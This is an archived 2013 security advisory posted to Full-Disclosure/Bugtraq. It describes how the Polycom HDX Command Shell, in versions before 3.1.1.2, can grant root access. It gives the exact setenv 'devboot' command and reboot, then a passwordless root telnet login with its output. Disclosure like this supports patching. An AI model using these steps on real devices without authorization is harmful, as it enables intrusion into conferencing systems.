lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <006501ce21a4$bce37720$36aa6560$@nruns.com>
Date: Fri, 15 Mar 2013 18:44:13 +0100
From: <security@...ns.com>
To: <full-disclosure@...ts.grok.org.uk>,
	<bugtraq@...urityfocus.com>
Cc: cve@...re.org, soc@...cert.gov, vuln@...unia.com, cert@...t.org
Subject: n.runs-SA-2013.001 - Polycom - Command Shell
	Grants System-Level Access

n.runs AG
http://www.nruns.com/
security(at)nruns.com
n.runs-SA-2013.001						15-Mar-2013
___________________________________________________________________________
Vendor:		Polycom, http://www.polycom.com
Affected Products:	Polycom HDX Series
Affected Version:	< 3.1.1.2
Vulnerability:		Polycom Command Shell Grants System-Level Access
Risk:			LOW
___________________________________________________________________________

Overview:

The Polycom Command Shell is a command-line based administrative interface
to the Polycom HDX system. It can be accessed either via a RS-232 serial
connection or via telnet on port 23.

Description:

The Polycom Command Shell can be used to view and also change several
settings of the system. However it can also be used to get system-level
access (i.e. root access) to the HDX system. The "printenv" and "setenv"
commands can be used to read and write variables respectively which are
stored in flash memory.

The easiest way to get root access to the HDX system is to enable the
"development mode" of the system which will then enable a telnet server
where a root login without a password is possible. In order to enable
the development mode, the "devboot" U-Boot environment variable must
be set. This can be done through the Polycom Command Shell with the
following commands:

    $ cu -l ttyUSB0 -s 9600
    -> setenv othbootargs "devboot=bogus"
    -> reboot
    reboot, are you sure? <y,n> y

This will reboot the system and enable a telnet server where a login as
root is possible.

    $ telnet 192.168.0.218
    Trying 192.168.0.218...
    Connected to 192.168.0.218.
    Escape character is '^]'.

    hdx7000.lan login: root
    ## Error: "vidoutsize" not defined
    # id
    uid=0(root) gid=0(root)
    # uname -a
    Linux hdx7000.lan 2.6.18.1.p2.14 #1 PREEMPT Wed Feb 3 10:25:31 CST 2010
ppc unknown
    #

Impact:

Someone with legitimate access to the Polycom Command Shell can get
direct system-level access to the underlying embedded Linux system.
This can be used to further analyze the system.

Solution:

Polycom released version 3.1.1.2 of the HDX software which fixes this
issue. It can be downloaded from the Polycom Support page at
http://support.polycom.com.
___________________________________________________________________________

Credit:
Bug found by Moritz Jodeit of n.runs AG.
___________________________________________________________________________

Unaltered electronic reproduction of this advisory is permitted. For all
other reproduction or publication, in printing or otherwise, contact
security@...ns.com for permission. Use of the advisory constitutes
acceptance for use in an "as is" condition. All warranties are excluded.
In no event shall n.runs be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages, even if n.runs has been advised of the possibility of
such damages.

Copyright 2013 n.runs AG. All rights reserved. Terms of use apply.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ